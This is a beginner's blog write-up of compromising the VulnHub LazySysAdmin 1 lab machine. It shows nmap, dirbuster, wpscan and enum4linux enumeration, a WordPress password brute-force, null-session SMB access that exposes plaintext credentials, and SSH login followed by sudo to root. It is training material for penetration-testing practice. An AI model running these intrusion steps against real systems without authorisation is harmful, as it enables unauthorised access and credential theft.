I’ve never tried a VulnHub box before. I initially downloaded the Bulldog one but couldn’t even work out what its IP address was! LazySysAdmin 1 caught my eye. Apparently created as the author failed his OSCP – my kind of guy and this one seems to pick up DHCP OK so found it on 192.168.3.20
First off some nmapping to see what’s there:
Initial Enumeration
(makes it sound like I have a formal plan, which I don’t, but should)
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
root@kali2017-1:~# nmap -sS 192.168.3.20 Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-13 08:22 BST Nmap scan report for 192.168.3.20 Host is up (0.00025s latency). Not shown: 994 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 139/tcp open netbios-ssn 445/tcp open microsoft-ds 3306/tcp open mysql 6667/tcp open irc MAC Address: 00:0C:29:CD:54:BA (VMware) Nmap done: 1 IP address (1 host up) scanned in 1.61 seconds |
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
root@kali2017-1:~# nmap -sV 192.168.3.20 Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-13 08:37 BST Nmap scan report for 192.168.3.20 Host is up (0.00025s latency). Not shown: 994 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 3306/tcp open mysql MySQL (unauthorized) 6667/tcp open irc InspIRCd MAC Address: 00:0C:29:CD:54:BA (VMware) Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel |
So looks like an Ubuntu box running a web server, SSH, samba shares, a MySQL database (probably for the website) and an IRC server.
This is the bit in the process I start to worry – lots of things there and not sure which one to go for first. Starting at the top of the list: OpenSSH 6.6.1p1. Googling doesn’t offer up any obvious exploits. I’m sure there is a better way of running service versions through a tool to find these – need to find out.
Apache 2.4.7 – this has exploits by the look of it but the site I looked at had “none” in every instance in the column marked “access gained” so that doesn’t look promising.
So onto the website. Firefox to the IP and a site pops up. Not actually much there. Buttons don’t do anything. Links go nowhere other than a couple of external ones at the bottom of the page.
So now what? Consult my course notes. Doesn’t seem a lot of point in using Burp as no transactions are taking place although maybe its Spider would find things. Dirbuster seems like a better shot. Maybe there are some hidden directories and files, what with it clearly being an unfinished mock-up website. I choose directory-list-2.3-small.txt wordlist as I don’t want to be waiting an age. It immediately starts finding an absolute shed-load of stuff.
It’s running WordPress in the /wordpress directory, we can get to phpmyadmin (a web interface for managing SQL databases) and there are some other folders. Visiting the site:
Is someone trying to tell us something here? Several times? And is his name togie? Jot that down as a possible username for later. Not much else to see here. Maybe give wpscan a spin with a general scan:
WPSCAN
|
1 |
wpscan -u 192.168.3.20/wordpress |
The most interesting thing this finds is:
|
1 2 3 4 |
[!] 1 vulnerability identified from the version number [!] Title: WordPress 2.3-4.8.2 - Host Header Injection in Password Reset Reference: https://wpvulndb.com/vulnerabilities/8807 |
The vulnerability involves setting a different email for password resets. Since this machine is on my network I’m not sure how useful that is.
|
1 |
wpscan -u 192.168.3.20/wordpress --enumerate u |
|
1 2 3 4 5 6 7 8 |
[+] Enumerating usernames ... [+] Identified the following 1 user/s: +----+-------+---------+ | Id | Login | Name | +----+-------+---------+ | 1 | admin | Admin – | +----+-------+---------+ [!] Default first WordPress username 'admin' is still used |
Hooray. We have a login name: admin
wpscan gives some options and one of them is to bruteforce the login with an known username so I try that:
|
1 |
wpscan --url 192.168.3.20/wordpress --wordlist /usr/share/seclists/Passwords/darkc0de.txt --username admin |
That looks like it’s going to take a while and whilst it’s revving my laptop fan, I’ll see what else I can be looking into.
SAMBA shares
Time to dig out my pentesting course notes on null shares. First thing my notes suggest is nmblookup
|
1 2 3 4 5 6 7 8 9 |
root@kali2017-1:~# nmblookup -A 192.168.3.20 Looking up status of 192.168.3.20 LAZYSYSADMIN <00> - B <ACTIVE> LAZYSYSADMIN <03> - B <ACTIVE> LAZYSYSADMIN <20> - B <ACTIVE> WORKGROUP <00> - <GROUP> B <ACTIVE> WORKGROUP <1e> - <GROUP> B <ACTIVE> MAC Address = 00-00-00-00-00-00 |
the <20> means there is an active share on the computer called LAZYSYSADMIN
|
1 2 3 4 5 6 7 8 9 |
root@kali2017-1:~# smbclient -L //192.168.3.20 -N WARNING: The "syslog" option is deprecated OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu] Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers share$ Disk Sumshare IPC$ IPC IPC Service (Web server) |
smbclient -L lists the shares and the -N switch tells it not to use a password
So there is a share there called “share$” In the meantime I’ve turned off wpscan’s password forcing as I’m scared my laptop will die from heat exhaustion. Now everything is strangely quiet as I pull the next tool from the badly written Word print out I’m working off:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 |
root@kali2017-1:~# enum4linux -a 192.168.3.20 Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Oct 13 10:22:10 2017 ========================== | Target Information | ========================== Target ........... 192.168.3.20 RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none ==================================================== | Enumerating Workgroup/Domain on 192.168.3.20 | ==================================================== [+] Got domain/workgroup name: WORKGROUP ============================================ | Nbtstat Information for 192.168.3.20 | ============================================ Looking up status of 192.168.3.20 LAZYSYSADMIN <00> - B <ACTIVE> Workstation Service LAZYSYSADMIN <03> - B <ACTIVE> Messenger Service LAZYSYSADMIN <20> - B <ACTIVE> File Server Service WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections MAC Address = 00-00-00-00-00-00 ===================================== | Session Check on 192.168.3.20 | ===================================== [+] Server 192.168.3.20 allows sessions using username '', password '' ========================================= | Share Enumeration on 192.168.3.20 | ========================================= Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers share$ Disk Sumshare IPC$ IPC IPC Service (Web server) [+] Attempting to map shares on 192.168.3.20 //192.168.3.20/print$ Mapping: DENIED, Listing: N/A //192.168.3.20/share$ Mapping: OK, Listing: OK //192.168.3.20/IPC$ Mapping: OK Listing: DENIED ======================================================================= | Users on 192.168.3.20 via RID cycling (RIDS: 500-550,1000-1050) | ======================================================================= [I] Found new SID: S-1-22-1 [I] Found new SID: S-1-5-21-2952042175-1524911573-1237092750 [I] Found new SID: S-1-5-32 [+] Enumerating users using SID S-1-5-21-2952042175-1524911573-1237092750 and logon username '', password '' S-1-5-21-2952042175-1524911573-1237092750-500 *unknown*\*unknown* (8) S-1-5-21-2952042175-1524911573-1237092750-501 LAZYSYSADMIN\nobody (Local User) S-1-5-21-2952042175-1524911573-1237092750-513 LAZYSYSADMIN\None (Domain Group) [+] Enumerating users using SID S-1-22-1 and logon username '', password '' S-1-22-1-1000 Unix User\togie (Local User) |
The actual output is mahoosive and I’ve stripped most of the crap away. Important things, IMO, are:
- It allows null sessions
- We can list and map share$
- There is a user called nobody (I think?)
- There is a unix user call togie
My notes say we can connect to shares with smbclient \\\\host\\sharename -N with the -N meaning null session (i.e. user/pass not required)
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 |
root@kali2017-1:~# smbclient \\\\192.168.3.20\\share$ -N WARNING: The "syslog" option is deprecated OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu] smb: \> ls . D 0 Tue Aug 15 12:05:52 2017 .. D 0 Mon Aug 14 13:34:47 2017 wordpress D 0 Thu Oct 12 16:23:54 2017 Backnode_files D 0 Mon Aug 14 13:08:26 2017 wp D 0 Tue Aug 15 11:51:23 2017 deets.txt N 139 Mon Aug 14 13:20:05 2017 robots.txt N 92 Mon Aug 14 13:36:14 2017 todolist.txt N 79 Mon Aug 14 13:39:56 2017 apache D 0 Mon Aug 14 13:35:19 2017 index.html N 36072 Sun Aug 6 06:02:15 2017 info.php N 20 Tue Aug 15 11:55:19 2017 test D 0 Mon Aug 14 13:35:10 2017 old D 0 Mon Aug 14 13:35:13 2017 3029776 blocks of size 1024. 0 blocks available smb: \> |
I’ve got an smb session here and some files and folders, some of which are recognisable from the Dirbuster scan. So looks like this share contains the website stuff. I could use smb commands like get to get the files but I’m gonna try Kali’s file browser first.
Fill in the server details: smb://192.168.3.20/share$ and now I’ve got a much easier way of browsing the share and it satisfies the Windows admin in me. Files first:
todolist.txt: “Prevent users from being able to view to web root using the local file browser” – it’s a bit late for that now son.
deets.txt: “CBF Remembering all these passwords. Remember to remove this file and update your password after we push out the server. Password 12345“
Nothing interesting in robots.txt. I try writing to the share but not allowed.
But we have a password and two usernames: admin and togie. Can I log onto the share using these credentials I wonder? Well not sure really. Using the username togie works but then it accepts any password and commands to write to the share are still not allowed.
I’l check out the folders. To cut a long story short, there is an important WordPress file called wp-config.php
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
// ** MySQL settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define('DB_NAME', 'wordpress'); /** MySQL database username */ define('DB_USER', 'Admin'); /** MySQL database password */ define('DB_PASSWORD', 'TogieMYSQL12345^^'); /** MySQL hostname */ define('DB_HOST', 'localhost'); |
So now we have credentials for the mysql database. Admin and TogieMYSQL12345^^ I try connecting from my kali box but it says:
|
1 |
ERROR 1130 (HY000): Host '192.168.3.25' is not allowed to connect to this MySQL server |
Assuming I’m not doing something wrong (ha ha good one) then looks like remote connections are not allowed. Maybe the myql creds come in handy later. The securi-tay box used them to get root privs so you never know.Actually, Dirbuster told us about access to myphpadmin so maybe the creds come in handy there?
But before that, let’s try out some of these credentials on the Lazysysadminbox:
Really? That’s it? Weird. So nothing fancy with WordPress or myphpadmin required? I’m gonna ssh into it now simply because it’s easier to copy and paste the code to this blog
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 |
The authenticity of host '192.168.3.20 (192.168.3.20)' can't be established. ECDSA key fingerprint is SHA256:pHi3EZCmITZrakf7q4RvD2wzkKqmJF0F/SIhYcFzkOI. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '192.168.3.20' (ECDSA) to the list of known hosts. ################################################################################################## # Welcome to Web_TR1 # # All connections are monitored and recorded # # Disconnect IMMEDIATELY if you are not an authorized user! # ################################################################################################## togie@192.168.3.20's password: Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686) togie@LazySysAdmin:~$ ls / bin dev home lib media old proc run srv tmp var boot etc initrd.img lost+found mnt opt root sbin sys usr vmlinuz togie@LazySysAdmin:~$ cd / -rbash: cd: restricted togie@LazySysAdmin:~$ cd root -rbash: cd: restricted togie@LazySysAdmin:~$ sudo su [sudo] password for togie: root@LazySysAdmin:/home/togie# cd root bash: cd: root: No such file or directory root@LazySysAdmin:/home/togie# ls root@LazySysAdmin:/home/togie# cd .. root@LazySysAdmin:/home# ls togie root@LazySysAdmin:/home# cd .. root@LazySysAdmin:/# ls bin dev home lib media old proc run srv tmp var boot etc initrd.img lost+found mnt opt root sbin sys usr vmlinuz root@LazySysAdmin:/# cd root root@LazySysAdmin:~# ls proof.txt root@LazySysAdmin:~# cat proof.txt WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851 Well done :) Hope you learn't a few things along the way. Regards, Togie Mcdogie Enjoy some random strings WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851 2d2v#X6x9%D6!DDf4xC1ds6YdOEjug3otDmc1$#slTET7 pf%&1nRpaj^68ZeV2St9GkdoDkj48Fl$MI97Zt2nebt02 bhO!5Je65B6Z0bhZhQ3W64wL65wonnQ$@yw%Zhy0U19pu root@LazySysAdmin:~# |
In a nutshell: couldn’t get to the root folder. Sudo su accepted togie’s 12345 password. Now have full access and capture the flag.
Leave a Reply